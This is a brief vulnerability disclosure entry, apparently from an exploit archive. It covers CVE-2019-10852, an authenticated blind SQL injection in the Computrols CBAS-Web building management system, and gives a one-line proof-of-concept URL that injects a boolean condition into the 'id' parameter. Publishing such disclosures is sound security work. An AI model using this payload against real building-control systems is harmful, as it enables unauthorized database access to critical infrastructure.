Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection

Affected versions: 19.0.0 and below
CVE: CVE-2019-10852
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

by Gjoko 'LiquidWorm' Krstic

PoC (id param):

http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510